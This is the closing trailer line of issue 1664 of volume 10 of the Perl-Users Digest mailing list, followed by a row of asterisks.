End of Perl-Users Digest V10 Issue 1664
***************************************
